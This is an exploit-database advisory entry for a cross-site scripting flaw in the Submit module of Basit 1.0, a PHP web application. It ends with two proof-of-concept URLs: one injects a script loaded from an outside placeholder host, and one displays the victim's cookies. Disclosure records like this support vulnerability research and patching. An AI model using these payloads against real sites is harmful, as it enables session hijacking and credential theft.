Basit 1.0 Submit Module - Cross-Site Scripting

Author: Ertan Kurt
type: webapps
platform: php
port: 
date_added: 2003-03-19  
date_updated: 2012-11-01  
verified: 1  
codes: OSVDB-50539  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22383.txt  
source: https://www.securityfocus.com/bid/7139/info

A cross-site scripting vulnerability has been reported for Basit. This vulnerability occurs due to insufficient sanitization of some user-supplied input. As a result of this deficiency an attacker may exploit the vulnerability by creating a specially crafted URL that includes malicious HTML code as URI parameters for Basit's Submit module.

This may allow for theft of cookie-based authentication credentials and other attacks.

http://target/modules/Submit/index.php?op=pre&title=<script%20src="http://othersite/code.js">test</script>
http://target/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>